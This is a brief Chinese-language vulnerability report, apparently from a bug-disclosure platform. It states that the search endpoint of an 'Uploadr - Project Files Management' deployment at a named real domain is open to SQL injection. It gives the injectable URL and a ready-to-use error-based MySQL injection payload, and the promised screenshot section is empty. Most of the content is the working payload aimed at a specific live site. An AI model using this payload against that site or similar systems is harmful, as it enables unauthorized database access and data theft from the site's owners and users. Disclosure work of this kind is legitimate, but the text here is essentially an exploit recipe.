Uploadr - Project Files Management /search处 存在SQL注入
注入点:
http://download.lagunaproperty.com/search?keyword=[SQL]
error-based payload:
/search?keyword=1%' AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(md5(233),0x716b717871,(SELECT (ELT(4271=4271,1))),0x7170707071,0x78))s), 8446744073709551610, 8446744073709551610))) AND '%'='
测试截图:

此处存在的其他注入类型及payload

暂无评论